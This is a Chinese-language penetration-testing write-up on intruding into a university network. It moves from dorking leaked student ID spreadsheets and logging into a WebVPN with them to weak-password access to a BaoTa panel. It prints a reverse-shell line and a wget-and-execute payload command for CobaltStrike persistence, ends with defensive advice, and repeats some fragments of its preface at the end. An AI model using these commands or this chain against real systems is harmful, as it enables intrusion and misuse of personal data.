从信息泄露到内网渗透：教育系统漏洞挖掘实战教学<\/h1>

0x00 前言<\/h2>
本教学文档详细记录了一次针对教育系统(edu.cn)的渗透测试过程，从信息收集开始，通过敏感信息泄露发现突破口，最终实现内网渗透的全过程。该漏洞已通过合法渠道提交并修复。<\/p>

0x01 信息收集阶段<\/h2>

1. 信息收集方法论<\/h3>

本次渗透测试使用了以下信息收集技术组合：<\/p>

Google Hacking技术<\/li>
Github信息收集(未获有效信息)<\/li>
前端信息泄露分析<\/li>

ARL灯塔资产收集系统(用于子域名、IP、端口服务、文件泄露等)<\/li> <\/ul>

2. Google Hacking实战<\/h3>

使用特殊搜索语法发现敏感信息：<\/p>

filetype:xls site:xxx.edu.cn 身份
<\/span><\/span><\/code><\/pre>此搜索语法可发现包含"身份"关键词的Excel文件，其中可能包含敏感信息。<\/p>
验证过程<\/strong>：<\/p>

发现标题为"名单"的Excel文件<\/li>
下载并审查文件内容<\/li>
确认文件中包含身份证号和学号等敏感信息<\/li>
<\/ol>
3. WebVPN入口发现<\/h3>
通过ARL资产扫描发现关键入口点：<\/p>

发现WebVPN系统(常见内网入口)<\/li>
使用之前获取的身份证号和学号尝试登录<\/li>
成功登录后观察系统功能<\/li>
<\/ul>
4. WebVPN结构分析<\/h3>
发现WebVPN URL具有特定规律：<\/p>
http:\/\/[访问地址].xxx.xxx.edu.cn:8118
<\/code><\/pre>
其中[访问地址]<\/code>部分可替换为任意域名，系统会自动拼接访问。<\/p>
验证方法<\/strong>：

将访问地址改为2021-ip138-com<\/code>进行测试，确认该结构有效。<\/p>
5. 前端信息泄露<\/h3>
在抓包分析官网(www.xxx.edu.cn)时发现：<\/p>

响应中包含内网IP地址(10.30.252.33)<\/li>
尝试直接访问失败<\/li>
推测该IP属于校园网站服务器网段<\/li>
<\/ul>
内网探测方法<\/strong>：<\/p>

修改C段地址进行探测(如10.30.252.23)<\/li>
确认部分内网地址可访问<\/li>
但无法直接指定端口和HTTPS访问<\/li>
<\/ol>
6. 端口指定技巧<\/h3>
通过Google搜索发现特殊URL结构：<\/p>
http:\/\/xxx-xxx-edu-cn-8090-p-s.xxx.xxx.edu.cn:8118\/surveydetail.aspx?pid=5&cid=397
<\/code><\/pre>
解析出以下规则：<\/p>

-8080-p<\/code>：指定端口<\/li>
-s<\/code>：指定HTTPS访问<\/li>
<\/ul>
0x02 内网渗透阶段<\/h2>
1. 内网服务发现<\/h3>
利用发现的URL规则对内网进行探测，发现：<\/p>

宝塔面板管理界面<\/li>
尝试常见弱口令组合<\/li>
<\/ul>
2. 宝塔面板入侵<\/h3>
使用弱口令成功登录：<\/p>
用户名：admin
密码：admin
<\/code><\/pre>
3. 后门植入技术<\/h3>
通过宝塔面板的"任务计划"功能植入反弹shell：<\/p>
bash -i >& \/dev\/tcp\/IP\/PORT 0>&1<\/span>
<\/span><\/span><\/code><\/pre>4. 持久化控制<\/h3>
使用CobaltStrike(配合Cross2插件)建立持久控制：<\/p>
wget http:\/\/IP:PORT\/SHELLCODE &&<\/span> chmod +x SHELLCODE &&<\/span> .\/SHELLCODE
<\/span><\/span><\/code><\/pre>成功上线服务器。<\/p>
0x03 关键知识点总结<\/h2>


信息收集是渗透的核心<\/strong>：<\/p>

分散的信息可能在关键时刻形成突破口<\/li>
需要系统性地收集和关联各种信息<\/li>
<\/ul>
<\/li>

Google Hacking技巧<\/strong>：<\/p>

使用特定语法(filetype, site等)可发现敏感文件<\/li>
需要耐心审查下载的文件内容<\/li>
<\/ul>
<\/li>

WebVPN结构分析<\/strong>：<\/p>

理解URL拼接规则可扩大攻击面<\/li>
通过修改关键参数可访问更多资源<\/li>
<\/ul>
<\/li>

内网探测方法<\/strong>：<\/p>

从已知信息推断内网结构<\/li>
系统性地进行C段扫描<\/li>
掌握端口指定技巧<\/li>
<\/ul>
<\/li>

弱口令利用<\/strong>：<\/p>

管理界面常使用默认或弱口令<\/li>
需要尝试常见组合<\/li>
<\/ul>
<\/li>

后门技术<\/strong>：<\/p>

利用系统功能(如任务计划)植入后门<\/li>
使用成熟的C2框架建立持久控制<\/li>
<\/ul>
<\/li>
<\/ol>
0x04 防御建议<\/h2>


敏感信息保护<\/strong>：<\/p>

避免将含敏感信息的文件暴露在公网<\/li>
定期审查公开资源<\/li>
<\/ul>
<\/li>

WebVPN安全<\/strong>：<\/p>

实施强身份验证<\/li>
限制可访问的内网资源<\/li>
监控异常访问模式<\/li>
<\/ul>
<\/li>

密码策略<\/strong>：<\/p>

禁用默认凭证<\/li>
实施强密码策略<\/li>
启用多因素认证<\/li>
<\/ul>
<\/li>

系统加固<\/strong>：<\/p>

限制管理界面访问<\/li>
定期更新和打补丁<\/li>
监控可疑进程和网络连接<\/li>
<\/ul>
<\/li>

安全意识培训<\/strong>：<\/p>

提高开发和管理人员安全意识<\/li>
建立安全开发流程<\/li>
<\/ul>
<\/li>
<\/ol>
本教学文档完整呈现了一次教育系统渗透测试的技术路径，强调了信息收集在渗透测试中的核心地位，以及如何将零散信息关联形成完整攻击链的过程。<\/p>

从信息泄露到内网渗透：教育系统漏洞挖掘实战教学<\/h1>

0x00 前言<\/h2> 本教学文档详细记录了一次针对教育系统(edu.cn)的渗透测试过程，从信息收集开始，通过敏感信息泄露发现突破口，最终实现内网渗透的全过程。该漏洞已通过合法渠道提交并修复。<\/p>

0x01 信息收集阶段<\/h2>

0x02 内网渗透阶段<\/h2>

0x00 前言<\/h2>
本教学文档详细记录了一次针对教育系统(edu.cn)的渗透测试过程，从信息收集开始，通过敏感信息泄露发现突破口，最终实现内网渗透的全过程。该漏洞已通过合法渠道提交并修复。<\/p>